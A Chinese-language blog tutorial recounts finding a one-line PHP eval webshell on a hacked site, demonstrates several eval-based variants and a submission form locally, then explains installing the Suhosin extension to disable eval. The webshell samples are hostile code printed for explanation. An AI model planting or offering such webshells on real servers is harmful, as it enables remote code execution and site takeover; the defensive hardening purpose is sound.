前段时间,网站遭受了黑客的入侵,后来在排查中发现了一个php,里面的内容只有很少:
<?php eval($_POST[asda123131323156341]);?>
然后网上搜索一下php的eval函数,发现这个eval函数带有很大的安全隐患。
本地测试一下,在本地环境写一个php,内容如下:
default.php:
<?php eval($_GET[asda]);?>
然后访问一下:localhost/test/default.php?asda=phpinfo();
就可以看到已经把phpinfo给执行了。
或者是访问localhost/test/default.php?asda = echo 11111;同样也会发现1111被echo出来了。
类似的手段还有:
<?php $code="${${eval($_GET[c])}}";?>访问localhost/test/default.php?c=phpinfo();即可看到
<?php
$code=addslashes($_GET[c]);
eval(""$code"");
?>访问localhost/test/default.php?c= ${${phpinfo()}};即可看到
利用可以执行php的eval函数,黑客可以用这个来上传一些后台木马,比如说上传php,然后通过url访问这个php来获得更大的权限。这种称为一句话木马的入侵。比如说:写一个html,内容如下:
<html> <body> <form action="default.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
php.ini配置文件路径:/usr/local/php5/etc/php.ini
Nginx安装目录:/usr/local/nginx
Nginx网站根目录:/usr/local/nginx/html
1、安装编译工具
yum install wget make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils patch perl
2、安装suhosin
cd /usr/local/src #进入软件包存放目录 wget http://download.suhosin.org/suhosin-0.9.33.tgz #下载 tar zxvf suhosin-0.9.33.tgz #解压 cd suhosin-0.9.33 #进入安装目录 /usr/local/php5/bin/phpize #用phpize生成configure配置文件 ./configure --with-php-config=/usr/local/php5/bin/php-config #配置 make #编译 make install #安装 安装完成之后,出现下面的界面,记住以下路径,后面会用到。 Installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/ #suhosin模块路径
3、配置php支持suhosin
vi /usr/local/php5/etc/php.ini #编辑配置文件,在最后一行添加以下内容 extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so suhosin.executor.disable_eval = on
注意:suhosin.executor.disable_eval = on 的作用就是禁用eval函数
4、测试
vi /usr/local/nginx/html/phpinfo.php #编辑
<?php phpinfo(); ?>
:wq! #保存退出
service php-fpm restart #重启php-fpm
service nginx restart #重启nginx
注意:如果是apache的话也是一样的,重启apache即可。
浏览器打开phpinfo.php 如下图所示,可以看到suhosin相关信息
至此,Linux下php安装suhosin安装完成!
注意:禁用了 eval后,会有啥后果呢? 首先是代码里使用 eval 的软件将不能使用比如大名鼎鼎的 Discuz! 论坛和 PHPWind论坛将不能正常使用,也影响到phpMyAdmin的旧版本,如果更新到目前最新的3.2.5,就可以使用,只是默认有个警告的提示,在 config.inc.php 中加上 $cfg['SuhosinDisableWarning']=true;
就可以取消这个警告了。
注意:除了eval之外,还有assert也是类似的用法。
推荐学习:php视频教程
以上就是php怎样才能禁止有安全隐患的eval的详细内容!
查看更多关于php怎样才能禁止有安全隐患的eval的详细内容...